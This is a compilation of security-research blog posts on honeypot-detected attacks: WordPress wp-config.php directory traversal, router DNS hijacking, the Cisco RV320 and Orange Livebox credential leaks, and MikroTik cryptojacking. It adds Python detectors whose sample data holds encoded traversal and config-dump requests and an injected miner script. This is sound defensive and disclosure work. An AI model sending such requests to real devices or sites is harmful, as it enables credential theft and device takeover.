On Saturday, April 13, 2019, our honeypots detected an exploit attempt targeting WordPress sites with a defunct plugin, CodeArt – Google MP3 Player, installed. This malicious activity originated from a host on the network of LeaseWeb (AS60781) and exploited a directory traversal flaw to retrieve the wp-config.php settings file. Our scans have indicated 391 WordPress sites are using the vulnerable plugin and are open to this type of attack.
The Exploit Attempt
The wp-config.php file contains sensitive information such as the WordPress database name, username, password and hostname.
This file also contains the WordPress secret keys, which can be used to forge authentication cookies. However, access to the WordPress database alone is enough for a threat actor to leverage further attacks to compromise the site. If the password used for the database is the same as the admin user's password (credential reuse), it could be used to take over the targeted site via the front-end.
In short, there’s plenty of damage that can be incurred against a targeted site with the information contained in the wp-config.php file.
Vulnerable Sites Found
Using data provided by PublicWWW, we’ve scanned 964 WordPress sites currently using the “CodeArt – Google MP3 Player” plugin. Our scans found 391 sites are vulnerable.
The top three hosting providers of vulnerable sites are GoDaddy, Unified Layer, and OVH.
188 of the vulnerable sites found are hosted in the United States.
Due to the sensitive nature of this vulnerability, the list of vulnerable websites will not be published publicly. However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with MS-ISAC and affected government organizations, such as the Government of Los Angeles County.
The “CodeArt – Google MP3 Player” WordPress plugin is no longer maintained by developers and was last updated six years ago. Anyone still using this plugin is advised to remove it immediately and change their WordPress database and user passwords.
Our honeypots have detected additional directory traversal attacks against vulnerable WordPress sites, including those using the plugin described in this post.
188.8.131.52 (🇫🇷) is exploiting every known #WordPress directory traversal vulnerability to steal database credentials and security keys from targeted sites. pic.twitter.com/WEwIoFKTEL
Over the last three months, our honeypots have detected DNS hijacking attacks targeting various types of consumer routers. All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169). In this campaign, we’ve identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.
First wave – December 29, 2018
⚠️ WARNING ⚠️ Unauthenticated Remote DNS Change Exploit Detected
This wave targeted the same types of D-Link modems listed above. The rogue DNS server, 184.108.40.206, was again hosted by OVH Canada.
As Twitter user “parseword” noted, the majority of the DNS requests were being redirected to two IPs allocated to a crime-friendly hosting provider (AS206349) and another pointing to a service that monetizes parked domain names (AS395082).
The latest wave of attacks came from three distinct Google Cloud Platform hosts and targeted additional types of consumer routers not previously seen before including: ARG-W4 ADSL routers, DSLink 260E routers, Secutech routers, and TOTOLINK routers.
The rogue DNS servers used in this round, 220.127.116.11 and 18.104.22.168, are both hosted in Russia by Inoventica Services. Internet access is provided by their subsidiary Garant-Park-Internet Ltd (AS47196).
In all three waves, a recon scan was done using Masscan to check for active hosts on port 81/tcp prior to attempting the DNS hijacking exploits.
How many targeted devices are vulnerable?
Establishing a definitive total of vulnerable devices would require us to employ the same tactics used by the threat actors in this campaign. Obviously this won’t be done, however we can catalog how many are exposing at least one service to the public internet via data provided by BinaryEdge:
As we saw in years past with DNSChanger malware raking in $14 million, advertising-related fraud is still very lucrative for cybercriminals. Other researchers have noted domain parking remains a booming business often tied to illicit activities.
DNS hijacking is also used for phishing attacks which are largely transparent to users. In this case, the domain name of the targeted site is redirected by the rogue DNS server to a web server controlled by the threat actor. A recent DNS hijacking campaign targeting Brazilian banks was documented by Radware researchers.
Why was Google Cloud Platform used?
Being a large cloud service provider, dealing with abuse is an ongoing process for Google. However, unlike its competitors, Google makes it very easy for miscreants to abuse its platform.
Anyone with a Google account can access a “Google Cloud Shell” machine by simply visiting this URL. This service provides users with the equivalent of a Linux VPS with root privileges directly in a web browser. Due to the ephemeral nature of these virtual machines coupled with Google’s slow response time to abuse reports, it’s difficult to prevent this kind of malicious behavior.
In general, we recommend that users keep their home router firmware up-to-date. When security vulnerabilities are discovered, they are usually patched by the manufacturer to mitigate further attacks. It's also advisable to review your router's DNS settings to ensure they haven't been tampered with. Typically your DNS servers should be set to the ones provided by your ISP or to well-known public DNS resolvers.
Ixia researchers posted their findings on the DNS hijacking attacks originating from Google Cloud Platform. They found sites targeted for phishing included Netflix, PayPal, Uber, Gmail, and more.
We’ve been tracking the DNS hijacking attacks reported by @bad_packets yesterday. Here’s an updated list of targeted domains, along with the new IP hosting the phishing sites. Paypal, Google, Netflix are targeted, along with Brazilian banks and hosting services. HT @_mihaiv_ pic.twitter.com/C4tym5dN3H
On Friday, January 25, 2019, our honeypots detected opportunistic scanning activity from multiple hosts targeting Cisco Small Business RV320 and RV325 routers. A vulnerability exists in these routers that allows remote unauthenticated information disclosure (CVE-2019-1653), leading to remote code execution (CVE-2019-1652).
⚠️ WARNING ⚠️ Incoming scans detected from multiple hosts checking for vulnerable Cisco RV320/RV325 routers.
A vulnerability in the web-based management interface of these routers could allow an unauthenticated, remote attacker to retrieve sensitive configuration information. pic.twitter.com/OhQD55WNZD
These scans consisted of a GET request for /cgi-bin/config.exp which is the path that allows unauthenticated remote users to obtain an entire dump of the device’s configuration settings. This includes the administrator credentials, however the password is hashed.
Using data provided by BinaryEdge, we’ve scanned 15,309 unique IPv4 hosts and determined 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653.
6,247 out of 9,852 Cisco RV320 routers scanned are vulnerable
(1,650 are not vulnerable and 1,955 did not respond to our scans)
3,410 out of 5,457 Cisco RV325 routers scanned are vulnerable
(1,027 are not vulnerable and 1,020 did not respond to our scans)
This interactive map shows the total vulnerable hosts found per country. Overall, vulnerable devices were found in 122 countries and on the network of 1,619 unique internet service providers (autonomous systems).
These routers can be exploited further using the leaked credentials (CVE-2019-1652) resulting in remote code execution detailed in the proof-of-concept published by David Davidson (0x27).
These vulnerabilities affect Cisco RV320/RV325 routers running firmware releases 22.214.171.124 and 126.96.36.199. Cisco has released a patch for these routers that should be applied immediately by anyone using outdated firmware. Changing the device’s admin and WiFi credentials is also highly recommended as they may already be compromised. Cisco has published an advisory providing further details here.
Due to the sensitive nature of these vulnerabilities, the IP addresses of the affected Cisco RV320/RV325 routers will not be published publicly. However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with Cisco PSIRT and US-CERT for further investigation and remediation.
Update 2019-01-27: We’ve shared our findings with CIRCL and SingCERT regarding vulnerable routers in Luxembourg and Singapore, respectively.
On Friday, December 21, 2018, our honeypots observed an interesting scan consisting of a GET request for /get_getnetworkconf.cgi. Upon further investigation, we found this traffic was targeting Orange Livebox ADSL modems. A flaw exists in these modems that allows remote unauthenticated users to obtain the device’s SSID and WiFi password.
To assess the amount of devices vulnerable to this flaw, we obtained a list of Orange Livebox modems from Shodan.
Of the 30,063 IPv4 hosts found, our scans revealed:
19,490 leaking their WiFi credentials (SSID/password) in plaintext
2,018 not leaking any information, but still exposed to the internet
8,391 not responding to our scans
Many of the devices found to be leaking their WiFi password use the same password to administer the device (password reuse) or have not configured any custom password – so the factory default “admin/admin” credentials are still applied.
This allows any remote user to easily access the device and maliciously modify the device settings or firmware. In addition, they can obtain the phone number tied to the modem and conduct other serious exploits detailed in this Github repository.
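The three credential-leak requests described on this page (the plugin directory traversal for wp-config.php, GET /cgi-bin/config.exp on Cisco RV320/RV325, and GET /get_getnetworkconf.cgi on Orange Livebox) all leave a distinctive request line in web server or honeypot access logs. The detector below is an added example, not Bad Packets' tooling; the log lines are constructed, the WordPress plugin path in them is a placeholder, and the two CGI paths are the ones quoted in the posts.

```python
"""Flag access-log requests that match the credential-leak patterns in this post.
Added example: constructed log lines, placeholder plugin path, traversal check
tolerates URL/double encoding and backslash separators."""
import re
from urllib.parse import unquote

# Exact-path signatures quoted in the posts (matched after decoding, lower-cased).
SIGNATURES = {
    "cisco-rv320-config-dump": re.compile(r"^/cgi-bin/config\.exp$"),
    "orange-livebox-wifi-leak": re.compile(r"^/get_getnetworkconf\.cgi$"),
}

# Common/combined log format: ip ident user [ts] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def normalize(target):
    # Decode twice to catch double-encoded "%252e%252e%252f", then treat
    # backslashes as separators so "..\" traversal is caught as well.
    for _ in range(2):
        target = unquote(target)
    return target.replace("\\", "/").lower()

def classify(target):
    decoded = normalize(target)
    path = decoded.split("?", 1)[0]          # exact signatures ignore the query
    for name, rx in SIGNATURES.items():
        if rx.match(path):
            return name
    # Traversal to wp-config.php may sit in the path or in a query parameter.
    if "../" in decoded and "wp-config.php" in decoded:
        return "wordpress-traversal-wp-config"
    return None

def scan_log(lines):
    """Return (source_ip, tag, status) for every line matching a pattern.
    A 200 next to a traversal hit means the file was most likely served."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (tag := classify(m["target"])):
            hits.append((m["ip"], tag, int(m["status"])))
    return hits

# Constructed sample log (RFC 5737 documentation addresses, placeholder plugin path).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Apr/2019:10:01:02 +0000] "GET /wp-content/plugins/PLUGIN-PLACEHOLDER/dl.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 2310',
    '198.51.100.7 - - [25/Jan/2019:08:15:44 +0000] "GET /cgi-bin/config.exp HTTP/1.1" 200 91230',
    '192.0.2.9 - - [21/Dec/2018:03:22:10 +0000] "GET /get_getnetworkconf.cgi HTTP/1.1" 200 512',
    '192.0.2.44 - - [21/Dec/2018:03:23:10 +0000] "GET /index.php HTTP/1.1" 200 4096',
    '203.0.113.5 - - [13/Apr/2019:10:01:03 +0000] "GET /dl.php?file=%252e%252e%252fwp-config.php HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, tag, status in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {tag:32} status={status}")
```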
Unsurprisingly, the vast majority of affected devices were found to be on the network of Orange Espana (AS12479).
Initial scan source
The initial scan detected by our honeypots came from 188.8.131.52 which is an IP address associated to a Telefonica Spain customer. While we can only guess what the motive was behind these scans, it’s interesting to find the source is physically closer to the affected Livebox ADSL modems than say a threat actor in another country. This could allow them to connect to the WiFi network (SSID) if they were near one of the modems indexed by their scans.
Due to the sensitive nature of this flaw, the IP addresses of affected Orange Livebox ADSL modems will not be published publicly; however, the list is freely available for law enforcement and CERT teams to review. We’ve shared our findings directly with Orange Espana, Orange-CERT, and CCN-CERT for further investigation and remediation.
Update 4:00 AM PT: Orange-CERT has acknowledged our report and is investigating further.
Update 6:00 PM PT: CVE-2018-20377 has been assigned for the flaw described in this post.
Update 2018-12-25: These Orange Livebox Arcadyan ARV7519 modem firmware versions appear to be patched against the “/get_getnetworkconf.cgi” flaw that leaks WiFi credentials:
These versions are not patched and remain vulnerable to CVE-2018-20377:
Update 2018-12-29: Nearly 15,000 Orange Livebox Arcadyan ARV7519 modems have been patched against CVE-2018-20377.
Prior to December 25, over 19,000 Orange Livebox Arcadyan ARV7519 modems were vulnerable to CVE-2018-20377.
Over the last two months, the Bad Packets LLC team has been monitoring over 80 unique cryptojacking campaigns targeting vulnerable MikroTik routers. The latest statistics available from Censys and Shodan confirm hundreds of thousands of devices remain compromised.
These MikroTik routers are being compromised by miscreants exploiting CVE-2018-14847, a critical vulnerability that affects all versions of RouterOS through 6.42. A patch was issued earlier this year by MikroTik, however the latest statistics (above) reveal device owners and network operators have chosen not to apply it.
Ali Mosajjal provides an excellent discussion of this vulnerability and how it’s exploited here. Another post, by Simon Kenin, explains how the first cryptojacking campaigns targeted over 170,000 MikroTik routers in Brazil alone. Kenin described it best when he stated:
“Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices.”
Despite the warnings from Mosajjal and Kenin, numerous MikroTik routers worldwide remain compromised. Looking strictly at Coinhive infections alone, we clearly see the unfortunate truth.
Looking for compromised #MikroTik routers worldwide? They're easy to locate with these Censys and Shodan queries.
However, Coinhive isn’t the only type of cryptojacking malware being injected via these compromised routers. Looking at all the campaigns noted in the MikroTik Cryptojacking Campaigns spreadsheet, we find some interesting contenders.
While Coinhive is used in the vast majority of cryptojacking campaigns, it is not used by the largest campaign. Instead, CoinImp is used in a campaign consisting of 115,000 MikroTik routers, per the latest Censys results. A large share of compromised devices are found on the network of two service providers in Iran, AS59566 and AS56616.
Twitter user @VriesHd raises a good point that despite clear evidence, no AV company has flagged the domain or URL as malicious. Fortunately, users of the CoinBlockerLists are protected as all domains mentioned in this post and the IOC spreadsheet are included.
Here's something I can't understand; A single cryptojacking campaign targeting Mikrotik routers is allowed to infect 100.000+ routers worldwide, yet barely any AV-company seems to care about the domain, the files or the infections. No blogs. Nothing. srcip[.]com is free to go…. pic.twitter.com/LVc8j2bEMr
In this case, the cryptojacking malware appears to be injecting MinerAlt, a service that mines CryptoNight coins (Monero, Electroneum, etc.) while taking 30% of the revenue of their users. Unlike Coinhive, the websocket traffic is not in plain text (shown in tweet above).
Infected routers in this campaign are configured to throttle the CPU usage of the victims’ devices in a likely attempt to reduce detection. In the example shown below, the amount of CPU power used for mining cryptocurrency is roughly 80%.
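The site key and throttle value in an injected miner snippet are the IOCs tracked in the campaign spreadsheet, and the throttle is what produces the "roughly 80%" CPU usage mentioned above (a throttle of 0.2 leaves 80% of the CPU for mining). The extractor below is an added example, not Bad Packets' tooling: the HTML is constructed, the script host and site key are placeholders, and the `new X.Anonymous(key, {throttle: n})` constructor shape is assumed to follow the Coinhive-style API that several browser miners imitate.

```python
"""Pull cryptojacking IOCs (injected script URL, site key, throttle) out of an
HTML response that passed through a compromised router. Added example with a
constructed page; the miner constructor shape is an assumption."""
import re

# <script src="..."> tags, the usual vehicle for the injected miner library.
SCRIPT_SRC = re.compile(r"<script[^>]+src=['\"]([^'\"]+)['\"]", re.I)

# Coinhive-style constructor: new NS.Anonymous('SITEKEY', {throttle: 0.2, ...})
MINER_CTOR = re.compile(
    r"new\s+(\w+)\.Anonymous\(\s*['\"]([A-Za-z0-9_\-]{16,})['\"]"
    r"\s*(?:,\s*\{([^}]*)\})?",
    re.I,
)
THROTTLE = re.compile(r"throttle\s*:\s*([0-9.]+)")

def extract_iocs(html):
    """Return script URLs plus one record per miner instance found."""
    iocs = {"script_src": SCRIPT_SRC.findall(html), "miners": []}
    for namespace, site_key, opts in MINER_CTOR.findall(html):
        m = THROTTLE.search(opts or "")
        throttle = float(m.group(1)) if m else 0.0     # no throttle = full CPU
        iocs["miners"].append({
            "namespace": namespace,
            "site_key": site_key,
            "throttle": throttle,
            # throttle is the idle fraction, so 0.2 means ~80% of CPU mining
            "cpu_share_pct": round((1.0 - throttle) * 100),
        })
    return iocs

def matches_known_campaign(iocs, known_site_keys):
    """True if any extracted site key is already in the tracked IOC set."""
    return any(m["site_key"] in known_site_keys for m in iocs["miners"])

# Constructed sample: what a page looks like after a router injects a miner.
SAMPLE_HTML = """<html><head><title>Example</title>
<script src="https://miner.example/lib/miner.min.js"></script>
<script>
var miner = new Client.Anonymous('CONSTRUCTED_SITE_KEY_0123456789', {throttle: 0.2});
miner.start();
</script></head><body>hello</body></html>"""

if __name__ == "__main__":
    found = extract_iocs(SAMPLE_HTML)
    for rec in found["miners"]:
        print(rec)
```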
United States cryptojacking campaigns
Looking specifically at compromised MikroTik routers in the United States, a few troubling cryptojacking campaigns were found. On August 25, nearly 3,000 compromised routers with IP addresses assigned to Cogent Communications were located on Censys.
Over 4,000 compromised #MikroTik routers in the United States injecting Coinhive found on @censysio.
Almost a month later, another surprising cryptojacking campaign was discovered. This new campaign included over 600 MikroTik routers on the network of Douglas County Public Utility District in north central Washington state. Their network, AS27373, has been allocated 1,792 IPv4 addresses and the latest Censys results show 703 IPs consisting solely of MikroTik routers. In other words, 39% of the IPs they manage route to a compromised device.
Upon reviewing these findings, I notified US-CERT (NCCIC) in addition to other members of federal law enforcement, as these routers are on the network of a public energy co-operative. While I never received confirmation that an NCCIC incident number was assigned, I was told by the NCCIC to continue to send in similar reports in the future.
It’s alarming to see so many devices on a public utility’s network compromised, so I hope the NCCIC is able to provide them with guidance and/or assistance with the remediation process.
In less than 9 hours, the total found on Censys for the US has increased to 7,765. The network with the largest share of compromised MikroTik routers is AS18771 (Agavue LLC aka Cibola Wireless). This provider is a WISP in Albuquerque, NM. https://t.co/oQx6UMEiFD
The latest results found on Censys indicate cryptojacking campaigns targeting vulnerable MikroTik routers in the United States are not slowing down. Many Wireless Internet Service Providers (WISPs) appear to be affected, as numerous compromised devices can be found on their networks.
Instead of listing each IOC here, I have placed them in the MikroTik cryptojacking campaigns spreadsheet that lists each site key used for every campaign and includes notes on how the malware is injected.
Thanks to Censys for providing me with the API credits needed to keep this list frequently updated.
As I recently told Threatpost, scraping for pennies with Coinhive is not the worst-case scenario that miscreants can achieve with these compromised MikroTik routers. The report published by Netlab 360 illustrated how they can be used for much more nefarious purposes, such as eavesdropping on all traffic passing through them.
MikroTik users need to ensure they’re running the latest version of RouterOS which has patched CVE-2018-14847. Anyone using version 6.42 or older should apply the update ASAP, available here.
As always, I’m most active on Twitter — please follow @bad_packets for the latest updates.
The statistics shared in this post were accurate as of September 28, 2018. Since then, the amount of compromised MikroTik routers worldwide has greatly increased. The latest totals reveal over 400,000 have been hacked by miscreants.
421,073 compromised MikroTik routers found on @censysio.
Active #cryptojacking campaigns (unique IOCs): 106
Coinhive: 77
CoinImp: 9
WebMinePool: 6
OMINE (XMR pool): 3
All others: 11